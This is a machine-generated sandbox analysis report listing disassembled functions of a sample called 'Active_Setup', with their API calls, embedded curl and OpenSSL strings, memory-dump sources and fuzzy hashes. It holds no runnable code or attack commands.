                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _getenv
                                                                                                                                                  • String ID: .rnd$HOME$RANDFILE
                                                                                                                                                  • API String ID: 3834326495-2139794832
                                                                                                                                                  • Opcode ID: 0fcf0d3fc0c69e275803faa45f7b8dacdc5f186a90a887949625973f2ff020ce
                                                                                                                                                  • Instruction ID: 1846380e3ff71a4286de38e522a6c8f1270b620f58af807becc74267ae8bda80
                                                                                                                                                  • Opcode Fuzzy Hash: 0fcf0d3fc0c69e275803faa45f7b8dacdc5f186a90a887949625973f2ff020ce
                                                                                                                                                  • Instruction Fuzzy Hash: 8121F322A083A226C63276666C05A9BB6969F92760F1D065AE880DF301F654CE46A2D2
                                                                                                                                                  Function 00FD15C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • the ioctl callback returned %d, xrefs: 00FD1647
                                                                                                                                                  • ioctl callback returned error %d, xrefs: 00FD165A
                                                                                                                                                  • seek callback returned error %d, xrefs: 00FD1618
                                                                                                                                                  • necessary data rewind wasn't possible, xrefs: 00FD1694
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintf
                                                                                                                                                  • String ID: ioctl callback returned error %d$necessary data rewind wasn't possible$seek callback returned error %d$the ioctl callback returned %d
                                                                                                                                                  • API String ID: 4251218765-2561564945
                                                                                                                                                  • Opcode ID: 138803f4605ec05a066ccb1e7d94f71754e4c96f7694ceed7390c47f1d12f760
                                                                                                                                                  • Instruction ID: 3d70445c365ab2a05a377953f8c3d1443ac237f2480849f91abe6659a9fc9263
                                                                                                                                                  • Opcode Fuzzy Hash: 138803f4605ec05a066ccb1e7d94f71754e4c96f7694ceed7390c47f1d12f760
                                                                                                                                                  • Instruction Fuzzy Hash: AF210A72F40B017FE6309528EC02FE77398BF91730F0C051EF5689A281D6B8E8859655
                                                                                                                                                  Function 00FC1000 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • curl_msnprintf.ACTIVE_SETUP(?,000000A0,[%s %s %s],Header,from,?,?,?,00000000,00000000), ref: 00FC1085
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: curl_msnprintf
                                                                                                                                                  • String ID: Data$Header$[%s %s %s]$from
                                                                                                                                                  • API String ID: 1809024409-3178933089
                                                                                                                                                  • Opcode ID: 47c53da876f316e2c6c2d5a728154edd53fd41e215447eeb9e96095542dcbe40
                                                                                                                                                  • Instruction ID: 30937fcf9ca8d69c4eaba5f1aeaf956d73b62739f0567c10a2fa736e870a6fdd
                                                                                                                                                  • Opcode Fuzzy Hash: 47c53da876f316e2c6c2d5a728154edd53fd41e215447eeb9e96095542dcbe40
                                                                                                                                                  • Instruction Fuzzy Hash: D711D231B083868BD730DA14CA62FA7B3D6FFC9300F54451D9588C7211EB75EC549782
                                                                                                                                                  Function 00FC2F20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000008,00000004,00000004), ref: 00FC2F41
                                                                                                                                                  • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 00FC2FB7
                                                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00FC2FC1
                                                                                                                                                    • Part of subcall function 00FC10F0: curl_mvsnprintf.ACTIVE_SETUP(?,00000801,?,?,00FBEBDD), ref: 00FC1133
                                                                                                                                                  Strings
                                                                                                                                                  • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00FC2FC9
                                                                                                                                                  • Failed to set SO_KEEPALIVE on fd %d, xrefs: 00FC2F4C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorIoctlLastcurl_mvsnprintfsetsockopt
                                                                                                                                                  • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                                                                                                                                  • API String ID: 3446994914-277924715
                                                                                                                                                  • Opcode ID: fa2319cefede975c7373b43d4891f08b88e861e177372641aa948338043d7056
                                                                                                                                                  • Instruction ID: 285b6719d1d55506944cff61dd6db808e464530c95f26973b5cda2229dfd26e2
                                                                                                                                                  • Opcode Fuzzy Hash: fa2319cefede975c7373b43d4891f08b88e861e177372641aa948338043d7056
                                                                                                                                                  • Instruction Fuzzy Hash: 9E11C1B0A443016BE310AB759C07F1BB7E8FB94B00F44492CB689D61C1EA78D604D7A6
                                                                                                                                                  Function 01090F5E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F78
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F89
                                                                                                                                                  • __getptd.LIBCMT ref: 01090F97
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                  • String ID: MOC$csm
                                                                                                                                                  • API String ID: 803148776-1389381023
                                                                                                                                                  • Opcode ID: 73ba7ba13160aeacbfda672c2e4dccc5adac85a5c97d92267ebcf015c9588ecd
                                                                                                                                                  • Instruction ID: b53f958c9870f0acbab6b0cd22b0be98d756903dc375983e2e201d5026fef12a
                                                                                                                                                  • Opcode Fuzzy Hash: 73ba7ba13160aeacbfda672c2e4dccc5adac85a5c97d92267ebcf015c9588ecd
                                                                                                                                                  • Instruction Fuzzy Hash: DFE0863511420A8FDB10BB68C074BAD37D8FB74324F2605E1F4CCCB226E774D540A542
                                                                                                                                                  Function 00FB2160 Relevance: 7.6, APIs: 5, Instructions: 80fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00FB220D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileMove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3562171763-0
                                                                                                                                                  • Opcode ID: 7ffa8a18e9fe133ab57e18c6cf651c5e8ad3450386958b328adaa9df6cde6717
                                                                                                                                                  • Instruction ID: cb7b5b4be7725c015d5db43aacb21c2e746ea0c5146230c8f5de229422626ee9
                                                                                                                                                  • Opcode Fuzzy Hash: 7ffa8a18e9fe133ab57e18c6cf651c5e8ad3450386958b328adaa9df6cde6717
                                                                                                                                                  • Instruction Fuzzy Hash: E321D633B402115BD7705A2EAC08FA7B79CAB94771F114736FA46EB2C0CA64ED01AB94
                                                                                                                                                  Function 010894D7 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __getptd.LIBCMT ref: 010894E3
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __amsg_exit.LIBCMT ref: 01089503
                                                                                                                                                  • __lock.LIBCMT ref: 01089513
                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 01089530
                                                                                                                                                  • InterlockedIncrement.KERNEL32(02822CE0), ref: 0108955B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4271482742-0
                                                                                                                                                  • Opcode ID: aaa66db648907e609ed19ddbb58897038c24f13ac5c8d7ae39cb8fc3fddaaf27
                                                                                                                                                  • Instruction ID: ee38096f0e3aaa09b63816ca61cde43f4825a3e89a5bf76fcc53d1685ace640c
                                                                                                                                                  • Opcode Fuzzy Hash: aaa66db648907e609ed19ddbb58897038c24f13ac5c8d7ae39cb8fc3fddaaf27
                                                                                                                                                  • Instruction Fuzzy Hash: 9601F972A087229BE771BF6DD5157BD77E0BF40B28F100049E9D4A7284CB359981CBE5
                                                                                                                                                  Function 01080B7C Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __lock.LIBCMT ref: 01080B9A
                                                                                                                                                    • Part of subcall function 0108B9F1: __mtinitlocknum.LIBCMT ref: 0108BA07
                                                                                                                                                    • Part of subcall function 0108B9F1: __amsg_exit.LIBCMT ref: 0108BA13
                                                                                                                                                    • Part of subcall function 0108B9F1: EnterCriticalSection.KERNEL32(?,?,?,0108CBFA,00000004,010E5538,0000000C,0108B209,0107FCF5,?,00000000,00000000,00000000,?,010878BB,00000001), ref: 0108BA1B
                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 01080BA5
                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 01080BB4
                                                                                                                                                  • HeapFree.KERNEL32(00000000,0107FCF5,010E5068,0000000C,0108B9D2,00000000,010E5518,0000000C,0108BA0C,0107FCF5,?,?,0108CBFA,00000004,010E5538,0000000C), ref: 01080BE4
                                                                                                                                                  • GetLastError.KERNEL32(?,0108CBFA,00000004,010E5538,0000000C,0108B209,0107FCF5,?,00000000,00000000,00000000,?,010878BB,00000001,00000214), ref: 01080BF5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                                  • Opcode ID: 9419c455e280d04652976f5462db9d45bdcbc6221c1405501cd2a4cd2e806895
                                                                                                                                                  • Instruction ID: 0ac4a0fffa122a829ac428f920d0350e7b2407c50790ccae60d9b981d239822b
                                                                                                                                                  • Opcode Fuzzy Hash: 9419c455e280d04652976f5462db9d45bdcbc6221c1405501cd2a4cd2e806895
                                                                                                                                                  • Instruction Fuzzy Hash: 8301A27280C307EEDB307FB99809B9E7AE4AF10764F140449F5C4A6088DF398545CB91
                                                                                                                                                  Function 010804E2 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 01085075: _doexit.LIBCMT ref: 01085081
                                                                                                                                                  • ___set_flsgetvalue.LIBCMT ref: 010804F4
                                                                                                                                                    • Part of subcall function 0108771B: TlsGetValue.KERNEL32(0107FCF5,010878A7,?,0107FCF5,?), ref: 01087724
                                                                                                                                                    • Part of subcall function 0108771B: __decode_pointer.LIBCMT ref: 01087736
                                                                                                                                                    • Part of subcall function 0108771B: TlsSetValue.KERNEL32(00000000,0107FCF5,?), ref: 01087745
                                                                                                                                                  • ___fls_getvalue@4.LIBCMT ref: 010804FF
                                                                                                                                                    • Part of subcall function 010876FB: TlsGetValue.KERNEL32(?,?,01080504,00000000), ref: 01087709
                                                                                                                                                  • ___fls_setvalue@8.LIBCMT ref: 01080512
                                                                                                                                                    • Part of subcall function 0108774F: __decode_pointer.LIBCMT ref: 01087760
                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 0108051B
                                                                                                                                                  • ExitThread.KERNEL32 ref: 01080522
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 01080528
                                                                                                                                                  • __freefls@4.LIBCMT ref: 01080548
                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0108055B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 132634196-0
                                                                                                                                                  • Opcode ID: 5526945e464aab7d1e97371b1e6f9fca402c167b71ab43acae2a1c3838954bac
                                                                                                                                                  • Instruction ID: 52fd949ba84fa8405f0e42c65e3d8aaec3f06c11010b45c1e77574791d42d491
                                                                                                                                                  • Opcode Fuzzy Hash: 5526945e464aab7d1e97371b1e6f9fca402c167b71ab43acae2a1c3838954bac
                                                                                                                                                  • Instruction Fuzzy Hash: CCE04671808207678F113BF59D088DF3A6CBE65248F640810BAD4D3009FA2994128BB5
                                                                                                                                                  Function 010726B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 375COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _fprintf.LIBCMT ref: 010727B2
                                                                                                                                                    • Part of subcall function 00FE9B40: _raise.LIBCMT ref: 00FE9B5B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _fprintf_raise
                                                                                                                                                  • String ID: %s:%d: rec->data != rec->input$.\ssl\t1_enc.c$n >= 0
                                                                                                                                                  • API String ID: 1988439158-3097570779
                                                                                                                                                  • Opcode ID: 19835143e781a33e3bd4b01cd7c6cdcf3945fdfdfda6086643cce6005c08a6e4
                                                                                                                                                  • Instruction ID: e32cfea323d2a69f787abc0dcee13268a52d5f04116b5c3a0efa2560eaabdb18
                                                                                                                                                  • Opcode Fuzzy Hash: 19835143e781a33e3bd4b01cd7c6cdcf3945fdfdfda6086643cce6005c08a6e4
                                                                                                                                                  • Instruction Fuzzy Hash: D8D1F071E043829BD760DF29C881B6BB7E1BF98310F08496DF9D98B242E735E944C756
                                                                                                                                                  Function 010608F0 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 321COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _strncmp
                                                                                                                                                  • String ID: .\ssl\ssl_ciph.c$STRENGTH
                                                                                                                                                  • API String ID: 909875538-4120156686
                                                                                                                                                  • Opcode ID: 11a7e909a950d1803826cbd50ba900a2bde869ee12f5cc4d6fd6e52d3094f521
                                                                                                                                                  • Instruction ID: 73accdceb0dd9dcbd08cdf3b1d100ec704aea39714a74c6ea8c36634e25e8fd8
                                                                                                                                                  • Opcode Fuzzy Hash: 11a7e909a950d1803826cbd50ba900a2bde869ee12f5cc4d6fd6e52d3094f521
                                                                                                                                                  • Instruction Fuzzy Hash: EEB1F2706C83068FE7A4CF1DC48076ABBE9AB85354F08469DF6C58625DD370C586CBA3
                                                                                                                                                  Function 0109B02B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
